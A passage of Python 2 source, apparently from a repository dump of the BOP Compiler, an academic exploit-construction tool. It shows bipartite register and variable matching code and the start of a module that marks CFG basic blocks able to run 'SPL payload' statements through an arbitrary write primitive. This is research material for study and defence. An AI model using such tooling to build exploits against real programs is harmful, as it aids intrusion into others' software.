Therefore,\n                    # (path[1], path[2]) must be in M due to the construction of D(G,M). So, if\n                    # the 2nd edge is in M, the other endpoint won't have any other edges in M\n                    # b/c current matching is maximum and there's already one edge of M adjacent\n                    # to that endpoint. This makes any length 2 path in D(G,M) starting from an\n                    # uncovered vertex, feasible.\n\n                    # try to find all simple paths of length *exactly* 2 (3 vertices)\n                    for path in nx.all_simple_paths(D, u, v, cutoff=2):\n                        if len(path) != 3: continue                 \n                        feasible = path             # we got a feasible path\n                        break\n\n                    if feasible: break              # break both loops\n                if feasible: break                  # break both loops\n\n            if not feasible: return 0               # if no feasible path, stop\n            \n            # get an edge e which is in feasible path but not in M\n            e = (feasible[1], feasible[0]) if   (feasible[1], feasible[0]) not in M \\\n                                           else (feasible[1], feasible[2]) \n                \n            # create a new matching\n            Mprime = [m for m in M if m[0] != e[0] ] + [e]\n\n\n            # remove tuples from bitvector strings\n            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   \n                                                               else x, Mprime)\n\n\n            # M' (Mprime) is a new maximum matching. Invoke callback\n            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:\n                return -1                           # if callback wants to stop, stop\n\n            Mprime, M = M, Mprime                   # swap matchings (important!)\n\n        ''' ------------------------------------------------------------------------- '''\n        ''' common code for both cases                                                '''\n        ''' ------------------------------------------------------------------------- '''\n\n        # generate G+(e)\n        Gplus = copy.deepcopy(G)                    # get a hardcopy of G       \n        Gplus.remove_node( e[0] )                   # drop e and e's endpoints\n        Gplus.remove_node( e[1] )                   # along with all adjacent edges \n        \n        # generate G-(e)\n        Gminus = copy.deepcopy(G)                   # get a hardcopy of G\n        Gminus.remove_edge( e[0], e[1] )            # drop e\n\n        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)\n\n        # recursively find matchings for G+(e) and G-(e)\n        if self.__matchings_iter(Gplus, M, self.__D(Gplus, [x for x in M if x != e]) ) < 0:\n            del Gplus, Gminus, D                    # release allocated objects\n            return -1                               # quickly return from recursions\n\n        if self.__matchings_iter(Gminus, Mprime, self.__D(Gminus, Mprime)) < 0:\n            del Gplus, Gminus, D                    # release allocated objects\n            return -1                               # quickly return from recursions\n\n\n        del Gplus, Gminus, D                        # release allocated objects\n        return 0                                    # normal return\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __max_matchings_recursion(): Recursively find all maximum matchings for *registers*. This is\n    #       an exponential time approach, as tries all possible combinations. However, it's useful \n    #       to evaluate the correctness of the enum_max_matchings() (debug only).\n    #\n    # :Arg G: Graph to work on\n    # :Arg depth: Current recursion depth\n    # :Arg M: Current matching\n    # :Ret: None.\n    #\n    def __max_matchings_recursion( self, G, depth, M ):\n        if depth >= self.__n:                       # reach max depth?\n            self.__callback(M)                      # invoke callback and stop\n            return\n\n        curr = '__r%d' % depth                      # make current virtual register\n\n        for n in G.neighbors( curr ):               # for each adjacent vertex\n            # code is for debug, so keep it simple: Instead of keeping track of\n            # edges and nodes you remove, just copy the whole graph\n            NG = copy.deepcopy(G)\n\n            NG.remove_node( curr )                  # drop nodes that make a pair\n            NG.remove_node( n )\n\n            # move on the next matching\n            self.__max_matchings_recursion(NG, depth+1, M+[(curr, n)])\n            \n            del NG                                  # new graph not needed anymore\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: Graph to work on\n    # :Arg mode: Working mode (register/variable)\n    #\n    def __init__( self, graph, mode ):  \n        if not nx.is_bipartite(graph):              # check if graph is bipartite\n            raise Exception('Not a bipartite graph!')\n            \n        if nx.is_directed(graph):                   # check if graph is undirected\n            raise Exception('Not an undirected graph!')\n\n        self.__G = copy.deepcopy(graph)             # get graph\n\n\n        # drop nodes without edges\n        for n in [n for n in graph.nodes() if graph.degree(n) == 0]:\n            self.__G.remove_node(n)                 # remove node \n        \n\n        # opposite() is used to check the orientation of an edge\n        # check mode and set lambda accordingly.\n        try:                                        \n            self.__mode, self.__opposite = mode, {\n                'register' : lambda key : not re.match(r'^__r.$', key),\n                'variable' : lambda key : isinstance(key, long) or isinstance(key, tuple)\n            }[ mode ]\n        except KeyError: \n            fatal(\"Invalid mode '%s'\" % mode )      # invalid mode\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __del__(): Class destructor.\n    #\n    def __del__( self ):\n        del self.__G                                # release graph\n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_max_matchings(): Enumerate all maximum matchings.\n    #\n    # :Arg callback: A callback function to be invoked every time a new matching is found\n    # :Arg n: Size of max matching (optional)\n    # :Ret: None.\n    #\n    def enum_max_matchings( self, callback, n=-1 ):\n        self.__callback = callback                  # save callback function\n\n        # find a maximum matching in M      \n        M = nx.bipartite.maximum_matching(self.__G)\n\n        # M is a dictionary like: {'__r0': 'rdx', '__r1': 'rcx', '__r2': 'rax', 'rdx': '__r0', \n        # 'rcx': '__r1', 'rax': '__r2'}. Each edge it appears both in forward and reverse \n        # direction. So, we only keep edges in one direction (V1 -> V2)\n        #\n        # don't use .iteritems() (dictionary is modifed on the fly)\n        for key, val in M.items():\n            if self.__opposite(key):                # drop (host, virtual) (or (addr, var)) edges \n                del M[key]\n\n        M = M.items()                               # cast dictionary to list (for convenience)\n\n\n        # To get the number of virtual registers in the graph we can't use this:\n        #   virt, _ = nx.bipartite.sets(self.__G) \n        # \n        # This is because bipartite.sets() algorithmically find the sets. So, if a node has no\n        # edges it will classified in the 2nd set, even if it has attribute bipartite = 0. To\n        # fix that we can either drop nodes with no edges, or to use an alternative:\n        virt = [u for u, b in nx.get_node_attributes(self.__G,'bipartite').iteritems() if not b]\n\n\n        # check if matching cover all virtual registers (or variables)\n        # if not an explicit size is given, extract size from bipartite sets        \n        if n > 0 and len(M) < n or n < 0 and len(M) < len(virt):                    \n            dbg_arb(DBG_LVL_3, \"There are no maximum matchings for\", self.__G.edges())\n            return 0                                # abort\n\n\n        # TODO: M can be:\n        #   [('__r0', 'r14'), ('__r1', 'r15')]\n        #   [('foo', ('<BV64 0x7ffffffffff0020>',))]\n        #\n        # Because bitvectors are strings at this point, no exceptions are thrown\n\n        # remove tuples from bitvector strings\n        M = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple) else x, M)\n\n        # print 'M IS ', M\n\n        # M is a the 1st maximum matching. Invoke callback\n        # if self.__callback( sorted(M, key=lambda e: e[0]) ) < 0:\n        if self.__callback( M ) < 0:\n            return -1                               # if callback wants to stop, stop\n\n        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)\n\n        # find all other maximum matchings\n        return self.__matchings_iter(self.__G, M, self.__D(self.__G, M))    \n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_max_matchings_bf(): Enumerate all maximum matchings using brute force. This is simply\n    #       a wrapper of __max_matchings_recursion() (register only (DEB)).\n    #\n    # :Arg callback: A callback function to be invoked every time a new matching is found\n    # :Arg n: Size of max matching\n    # :Ret: None.\n    #\n    def enum_max_matchings_bf( self, callback, n ):\n        self.__callback = callback                  # save callback function\n        self.__n        = n                         # size of max matching\n\n        if self.__mode != 'register':               # this only available in register mode\n            fatal(\"Brute force matching is not supported in variable mode\")\n\n        self.__max_matchings_recursion(self.__G, 0, [])\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n# -------------------------------------------------------------------------------------------------\n# map: This class finds all matchings between virtual and host registers and between variables and \n#   addresses. This is mostly a wrapper of _match class. \n#\nclass map( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __intrl_callback_var(): This callback is invoked every time that a new variable matching is\n    #       found. This function is implicitly invoked by __intrl_callback_reg() which means that\n    #       at this point there is already a register mapping. This function is actually a wrapper\n    #       for the original callback of enum_mappings().\n    #\n    # :Arg match: A new matching, as a list of tuples\n    # :Ret: If function wants to be invoked again with a new matching, it should return a non\n    #   negative value. Otherwise returns 0.\n    #\n    def __intrl_callback_var( self, match ):\n\n        # invoke the real callback\n        return self.__callback(self.__reg_match, match)\n        \n\n    # ---------------------------------------------------------------------------------------------\n    # __intrl_callback_reg(): This callback is invoked every time that a new register matching is\n    #       found. At this point we have a maximum matching for registers (register mapping). \n    #       Given this matching, create the variable graph and enumerate all possible variable \n    #       matchings.\n    #\n    # :Arg match: A new matching, as a list of tuples\n    # :Ret: If function wants to be invoked again with a new matching, it should return a non\n    #   negative value. Otherwise returns 0.\n    #\n    def __intrl_callback_reg( self, match ):\n        self.__reg_match = match                    # save matching for later\n\n        vG = nx.Graph()                             # variable graph        \n        \n        for u, v in match:                          # for each edge in register mapping\n            try:\n                for a,b in self.__g.get_edge_data(u, v)['var']:\n                    vG.add_node(a, bipartite=0)\n                    vG.add_node(b, bipartite=1)\n                    vG.add_edge(a, b)\n            except KeyError: pass                   # edge has no weights\n        \n        match = _match(vG, 'variable')              # create a 2nd matching object\n\n\n        # enumerate all variable matchings, using an 2nd internal callback\n        if match.enum_max_matchings(self.__intrl_callback_var, self.__nvars) < 0:           \n            del match                               # free object   \n            return -1                               # no more matchings\n\n        del match                                   # free object\n        return 0                                    # normal return\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: Graph to work on\n    # :Arg nregs: Total number of virtual registers\n    # :Arg nvars: Total number of variables\n    #\n    def __init__( self, graph, nregs, nvars ):\n        self.__g     = graph                        # store arguments\n        self.__nregs = nregs\n        self.__nvars = nvars\n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_mappings(): Enumerate all possible register and variable mappings.\n    #\n    # :Arg callback: A callback function to be invoked, every time a mapping is found\n    # :Ret: None.\n    #\n    def enum_mappings( self, callback ):        \n        dbg_prnt(DBG_LVL_1, \"Enumerating all mappings between virtual and hardware registers\")\n        dbg_prnt(DBG_LVL_1, \"\\tand all mappings between variables and addresses...\")\n\n        self.__callback = callback                  # get callback\n\n        try:        \n            match = _match(self.__g, 'register')    # create a matching object\n        except Exception: return                    # catch exception\n\n        # enumerate all register matchings, using an internal callback\n        ret = match.enum_max_matchings(self.__intrl_callback_reg, self.__nregs)\n\n        del match                                   # free object\n        \n        return ret\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    G = nx.Graph()\n    \n    G.add_nodes_from(['__r0', '__r1', '__r2', '__r3'], bipartite=0)\n    G.add_nodes_from(['rax', 'rdx', 'rcx', 'rbx', 'rsi', 'rdi'], bipartite=1)   \n    \n    G.add_edges_from([ \n        ('__r0', 'rax'), ('__r0', 'rcx'), ('__r0', 'rsi'),\n        #('__r1', 'rax'), ('__r1', 'rdx'), ('__r1', 'rcx'), ('__r1', 'rbx'),\n        ('__r2', 'rcx'), ('__r2', 'rdi'), ('__r2', 'rsi'),\n        ('__r3', 'rdx'), ('__r3', 'rdi'), ('__r3', 'rsi')\n\n    ])  \n    \n#   G.add_nodes_from(['$loc_2'], bipartite=0)\n#   G.add_nodes_from([576460752303358032L, 576460752303358048L, 576460752303358064L], bipartite=1)  \n#\n#   G.add_edges_from([ \n#       ('$loc2', 576460752303358032L),\n#       ('$loc2', 576460752303358048L),\n#       ('$loc2', 576460752303358064L)\n#   ])\n    \n    def callback( m ):\n        print 'Got matching: ', m\n        return 0                                    # must return an non negative value\n\n    m = _match( G, 'register' )\n    m.enum_max_matchings( callback )\n\n    print '----------------------------------------'\n    m.enum_max_matchings_bf( callback, 4 )\n'''\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/mark.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# mark.py:\n#\n# This module is responsible for marking the CFG. To mark a basic block, this has to be abstracted\n# first (otherwise marking process is still possible but very compilcated). A basic block can be\n# marked as \"candidate\", \"accepted\", or \"clobbering\". Below are the preconditions for each \n# marking type:\n#\n#   candidate  : A basic block fulfils the requirements to execute one (or more) SPL statements,\n#                but there is not enough information to determine whether it can truly execute\n#                that statement(s).\n#\n#   accepted   : A basic block that can truly be used to execute one (or more) SPL statements.\n#\n#   clobbering : A basic block that \"clobbers\" (i.e., interferes) with the execution of an \n#                accepted block and therefore needs to be avoided.\n#\n#   failed     : Analysis on that basic block failed and therefore it should be treated as \n#                clobbering at all times.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import *\n\nimport absblk as A\n\nimport angr\nimport claripy\nimport simuvex\n\nimport networkx as nx\n\nimport struct\nimport copy\nimport cPickle as pickle\nimport pprint\nimport math\nimport re\n\n\n\n# -------------------------------------------------------------------------------------------------\n# mark: This class is responsible for marking the CFG.\n#\nclass mark( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __blk_cnt(): Count the number of \"functional\" basic blocks in the CFG.\n    #\n    # :Arg avoid: A list of function names to avoid (optional)\n    # :Arg which: Which basic blocks to count (default: 'all')\n    # :Ret: The number of basic blocks in the CFG.\n    # \n    def __blk_cnt( self, avoid=[], which='all'):     \n        # ---------------------------------------------------------------------\n        # Abstract method\n        #\n        # Count only abstracted basic blocks\n        # ---------------------------------------------------------------------\n        if which == 'abstract':\n            return len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())\n\n        # ---------------------------------------------------------------------\n        # All method\n        #\n        # Count all basic blocks\n        # ---------------------------------------------------------------------\n        elif which == 'all':\n            cnt = 0                                 # initialize counter\n\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if addr < self.__proj.loader.main_object.min_addr or \\\n                   addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if func.name in avoid:              # you may need to exclude some functions\n                    continue            \n                \n\n                for bb in func.block_addrs:         # count them 1 by 1 (len() doesn't work)\n                    cnt += 1\n\n            return cnt\n\n        # ---------------------------------------------------------------------\n        # Any other method should raise an error\n        # ---------------------------------------------------------------------\n        else: \n            fatal(\"Unknown method\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __blk_iter(): Iterate over basic blocks. This function is a generator over \"all\" basic\n    #       blocks in the CFG.\n    #\n    # :Arg avoid: A list of function names to avoid (optional)\n    # :Arg method: Iteration method (block/node/abstracted)\n    # :Ret: Every time function returns with either the address of the next basic block \n    #       ('block' method), or with a tuple (node, attributes) of the next basic block in the\n    #       CFG ('node' and 'abstracted' methods).\n    # \n    def __blk_iter( self, avoid=[], method='block' ):\n        # ---------------------------------------------------------------------\n        # Block method\n        #\n        # Iterate over each function and for each function iterate over block\n        # addresses.\n        # ---------------------------------------------------------------------\n        if method == 'block':\n            # iterate over each function\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if addr < self.__proj.loader.main_object.min_addr or \\\n                   addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if func.name in avoid:              # you may need to exclude some functions\n                    dbg_prnt(DBG_LVL_3, \"Skipping function '%s'!\" % func.name)\n                    continue            \n\n\n                # iterate over basic blocks for each function (sort them to ease debugging)\n                for bb in sorted(func.block_addrs):                                \n                    yield bb                        # return address of the next block\n\n\n        # ---------------------------------------------------------------------\n        # Node method\n        #\n        # Iterate over all nodes in CFG directly.\n        # ---------------------------------------------------------------------\n        elif method == 'node':\n            avoid_addr = { }                        # set of avoided functions\n\n            # iterate over each function\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                if func.name in avoid:\n                    avoid_addr[ addr ] = 1          # mark blocks that you want to avoid\n\n\n            # now iterate over nodes\n            for node, attr in self.__cfg.graph.nodes_iter(data=True):\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if node.addr < self.__proj.loader.main_object.min_addr or \\\n                   node.addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if node.addr in avoid_addr:         # if block is blacklisted,\n                    continue                        # skip it\n\n                yield node, attr                    # return tuple for that node\n\n\n        # ---------------------------------------------------------------------\n        # Abstract method\n        #\n        # Iterate over abstracted basic blcoks\n        # ---------------------------------------------------------------------\n        elif method == 'abstract':\n            for node, attr in nx.get_node_attributes(self.__cfg.graph, 'abstr').iteritems(): \n                yield node, attr                    # return tuple for the abstracted block\n\n\n        # ---------------------------------------------------------------------\n        # Any other method should raise an error\n        # ---------------------------------------------------------------------\n        else: \n            fatal(\"Unknown method\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __reg_filter(): Apply a filter to a given hardware register. Although tt's better to apply\n    #       this function on absblk, it's harder to make changes once abstractions are generated.\n    #\n    # :Arg reg: A register to check\n    # :Ret: If filter discards register, function returns False. Otherwise it returns True.\n    #\n    def __reg_filter( self, reg ):\n        # drop register mappings that use rsp (or rbp if configured)\n        if reg == 'rsp' or reg == 'rbp' and not MAKE_RBP_SYMBOLIC:\n            dbg_prnt(DBG_LVL_4, \"A virtual register cannot be mapped to '%s'\" % \n                                bolds(reg))\n\n            return False                            # can't pass through the filter\n\n        return True                                 # register not discarded\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __imm_addr(): Check if an address dereference stays immutable during block execution.\n    #       Consider the following example:\n    #\n    #           .text:00000000004008C0 add     eax, ebx\n    #           .text:00000000004008C2 mov     cs:foo, eax\n    #           .text:00000000004008C8 mov     eax, cs:foo\n    #\n    #       Here, although the value of eax is loaded from memory, we have no control over it, as\n    #       the same memory cell is being written by another register\n    #\n    #\n    # :Arg address: Address to check\n    # :Arg abstr: The whole block abstractions\n    # :Ret: If address is immutable function returns True. Otherwise it returns False.\n    #\n    def __imm_addr( self, address, abstr ):\n        if isinstance(address, int):\n            for addr, _ in abstr['conwr']:          # check concrete writes\n                if addr == address:\n                    dbg_prnt(DBG_LVL_3, \"Address 0x%x is not immutable.\" % address)\n                    return False \n\n        else:\n            for addr, _ in abstr['memwr']:          # check other writes\n                if addr.shallow_repr() == address.shallow_repr():\n                    dbg_prnt(DBG_LVL_3, \"Address '%s' is not immutable.\" % addr.shallow_repr())\n                    return False\n\n        return True\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # __mk_unique(): Make an adress string unique.\n    #\n    # :Arg addrstr: Address string\n    # :Arg sym: Symbolic variable\n    # :Ret: A unique address\n    #\n    def __mk_unique(self, addrstr, sym):\n\n        addrstr_orig = addrstr\n        sym_orig     = sym\n\n\n        if not sym:\n            # we don't care about non-register addresses as their shallow_reprs are identical\n            return addrstr_orig, sym_orig\n\n\n        orig = addrstr\n        for reg in HARDWARE_REGISTERS:\n            # This is tooooo slow!\n            #   orig = re.sub(r'%s_[0-9]+_64' % reg, '%s_64' % reg, orig)\n\n            # use the compiled version instead\n            orig = self.__regex[reg].sub('%s_64' % reg, orig)\n\n\n        # if dereference is already there, use it\n        if orig in self.__unique_derefs:\n            return self.__unique_derefs[orig] # (addr, sym)\n\n\n        # if unique, add it to the dictionary and return it as it is\n        self.__unique_derefs[orig] = (addrstr_orig, sym_orig)\n\n        return addrstr_orig, sym_orig\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n   \n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize variables that are required for the CFG\n    #      . marking process.\n    #\n    # \n    # :Arg project: Instance of angr project\n    # :Arg cfg: Program's CFG\n    # :Arg ir: Compiled IR of the SPL payload\n    # :Arg avoid: Any functions that should be avoided during marking process\n    #\n    def __init__( self, project, cfg, ir, avoid=[] ):\n        self.__proj  = project                      # save arguments to internal variables\n        self.__cfg   = cfg\n        self.__ir    = ir\n        self.__avoid = avoid\n\n\n        self.vartab = { }                           # variable table\n        self.varmap = { }                           # candidate addresses for variables        \n\n        self.__m  = { }                             # index basic block using their entry point\n\n\n        # Mapping Optimization\n        self.__unique_derefs = { }                  # unique derefences\n        self.__regex = { }\n        for reg in HARDWARE_REGISTERS:              # boost regex computations\n            self.__regex[reg] = re.compile(r'%s_[0-9]+_64' % reg)\n\n\n        self.__rg = nx.Graph()\n\n        self.__rg.add_nodes_from(['__r%d' % i for i in range(8)], bipartite=0)      \n        self.__rg.add_nodes_from(HARDWARE_REGISTERS, bipartite=1)\n\n        # create a mapping between basic blocks (nodes) and their entry points (addresses)\n        for node, _ in self.__cfg.graph.node.iteritems():\n            self.__m[ node.addr ] = node\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # abstract_cfg(): Iterate over CFG and \"abstract\" its basic blocks.\n    #\n    # :Ret: None. Any operations are directly applied to the CFG.\n    #\n    def abstract_cfg( self ):\n        dbg_prnt(DBG_LVL_1, \"Basic block abstraction process started.\")\n\n        nnodes    = self.__blk_cnt(self.__avoid)    # total number of nodes\n        counter   = 1\n        completed = 0\n\n\n        # for each basic block in cfg\n        for addr in self.__blk_iter(self.__avoid, 'block'):  \n            dbg_prnt(DBG_LVL_3, \"Abstracting block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            try:\n                # apply abstraction to the basic block that starts at \"addr\"\n                abstr = A.abstract_ng(self.__proj, addr)\n\n                # print 'ADDR', hex(addr)\n                # for a,b in abstr:\n                #     print '\\t', a, b\n                # \n                # exit()\n\n\n                # Abstraction is a process that needs to be done only once. \n                # Cache all abstractions, to avoid recalculating them later on.\n                self.__cfg.graph.add_node(ADDR2NODE[addr], abstr={n:a for n,a in abstr})\n\n                del abstr                           # release object to save memory\n\n            except Exception, err:\n                warn(\"Symbolic Execution at block 0x%x failed: '%s' Much sad :( \"\n                     \"Skipping current block...\" % (addr, str(err)))\n\n                # because we don't know what's going on in this block, we simply discard it\n                self.__cfg.graph.add_node(ADDR2NODE[addr], fail=1)\n\n            counter += 1\n\n\n            # show current progress (%)\n            percent = math.floor(100. / nnodes * counter)\n            if completed < percent:\n                completed = percent            \n                dbg_prnt(DBG_LVL_2, \"%d%% completed\" % completed)\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # save_abstractions(): Doing a symbolic execution on every basic block in the CFG is a very\n    #       time consuming operation. The abstraction process is independent of the SPL program,\n    #       saving the abstractions can save a lot of time when testing multiple SPL programs on\n    #       the same binary. This function dumps all abstractions into a file\n    #\n    # :Arg filename: Name of the file\n    # :Ret: If saving was successful, function returns True. Otherwise an error message is \n    #       displayed and function returns False.\n    #\n    def save_abstractions( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Saving basic block abstractions to a file...\")\n\n        abstr = { }                                 # place abstractions here\n        fail  = set()                               # and failures here\n\n\n        # collect all abstractions\n        for node, attr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems(): \n            abstr[node.addr] = attr\n\n        # collect all failures\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'fail').iteritems(): \n            fail.add(node.addr)\n\n        try:\n            output = open(filename + '.abs', 'wb')  # create the file\n            pickle.dump(abstr, output, 0)           # pickle dictionary using protocol 0.\n            pickle.dump(fail,  output, 0)\n            output.close()\n\n        except IOError, err:                        # error is not fatal, so don't abort program\n            warn(\"Cannot save abstractions: %s\" % str(err))\n            return False\n\n    \n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return True                                 # success!\n\n\n        \n    # --------------------------------------------------------------------------------------------- \n    # load_abstractions(): Load abstractions from a file that was created by save_abstractions().\n    #\n    # :Arg filename: Name of the file\n    # :Ret: If loading was successful, function returns True. Otherwise a fatal error is generated.\n    #\n    def load_abstractions( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Loading basic block abstractions from file...\")\n\n        abstr = { }                                 # place abstractions here\n        fail  = set()                               # and failures here\n\n\n        try:\n            pklfile = open(filename + '.abs', 'rb') # open the file\n            abstr = pickle.load(pklfile)            # load dictionary\n            fail  = pickle.load(pklfile)            # and failures\n\n            # pprint.pprint(abstr)\n            pklfile.close()\n\n        except IOError, err:                        # error is fatal, as we can't proceed\n            fatal(\"Cannot load abstractions: %s\" % str(err))\n            \n\n        # now iterate over nodes and place abstractions to the file\n        for node, attr in self.__cfg.graph.nodes(data=True):\n            if node.addr in abstr:\n                # dbg_arb(DBG_LVL_3, \"Abstractions for block 0x%x:\" % node.addr, abstr[node.addr])\n                self.__cfg.graph.add_node(ADDR2NODE[node.addr], abstr=abstr[node.addr])\n            \n\n            if node.addr in fail:\n                dbg_prnt(DBG_LVL_3, \"Analysis for block 0x%x failed :(\" % node.addr)\n\n                self.__cfg.graph.add_node(ADDR2NODE[node.addr], fail=1)\n\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return True                                 # success!\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # mark_candidate(): Iterate over abstracted basic blocks and identify all candidate ones. A \n    #       basic block is a candidate when it can potentially execute any IR statement(s). However\n    #       at this point we don't know yet whether this block can be really used to execute any\n    #       statements; it only fulfils the requirements.\n    #\n    # :Arg forced_mapping: TODO\n    # :Ret: If marking is possible (i.e., enough candidate blocks), then function returns True. \n    #       Otherwise it returns False. Also any operations are directly applied to the CFG.\n    #\n    def mark_candidate( self, forced_mapping=[] ):\n        dbg_prnt(DBG_LVL_1, \"Searching CFG for candidate basic blocks...\")\n\n\n        # ---------------------------------------------------------------------\n        # Create vartab from 'varset' statements\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_2, \"Creating vartab...\")\n\n        for stmt in [s for s in self.__ir if s['type'] == 'varset']:\n            self.vartab[ stmt['name'] ] = stmt['val']\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")       \n\n\n        nnodes  = self.__blk_cnt(self.__avoid, 'abstract')\n        counter = 1\n        \n\n        # ---------------------------------------------------------------------\n        # Check for forced mappings first\n        # ---------------------------------------------------------------------\n        if forced_mapping:\n            dbg_prnt(DBG_LVL_1, \"Applying forced mapping ...\")\n\n            warn(\"No check is made against arguments! %s\" % str(forced_mapping))\n\n\n            # self.__rg is empty\n            for vr, hw in forced_mapping:\n                # TODO: check if vr is in the form __r[0-7]\n\n                if not re.search(r'^__r.*', vr):    # check registers only\n                    continue\n\n                # make node immutable\n                nx.set_node_attributes(self.__rg, 'immutable', {vr:1})        \n                self.__rg.add_edge(vr, hw, var=set())\n\n\n        # ---------------------------------------------------------------------\n        # iterate over abstracted basic blocks\n        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):  \n            addr = node.addr\n\n            dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            cand = []                               # set of statement for that block\n\n            for stmt in self.__ir:                  # check for which statements block is candidate\n                match = []\n\n                # -----------------------------------------------------------------------\n                # Statement 'varset'\n                #\n                # Variable assignments do not require candidate blocks. Instead\n                # we leverage the AWP, to store variables anywhere in the\n                # memory.\n                #\n                # {'type': 'varset', 'uid': 6, 'val': ['a1'], 'name': 'test'}\n                # {'type': 'varset', 'uid': 8, 'val': ['\\xeb\\x17\\x00\\x00\\x00\\x00\\x00\\x00'], \n                #                   'name': 'foo'}\n                # {'type': 'varset', 'uid': 10, 'val': ['\\xd2\\x04\\x00\\x00\\x00\\x00\\x00\\x00', \n                #           ('foo',), ('test',)], 'name': 'bar'}\n                # -----------------------------------------------------------------------\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'regset'\n                #\n                # {'reg': 0, 'type': 'regset', 'valty': 'num', 'val': -10, 'uid': 2}\n                # {'reg': 6, 'type': 'regset', 'valty': 'var', 'val': ('bar',), 'uid': 12}\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'regset' and not isinstance(stmt['val'], tuple):\n                    \n                    for reg, data in abstr['regwr'].iteritems():\n                     #   print '{',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n\n                        if data['type'] == 'concrete' and stmt['val'] == data['const']:\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = 0x%x\" % 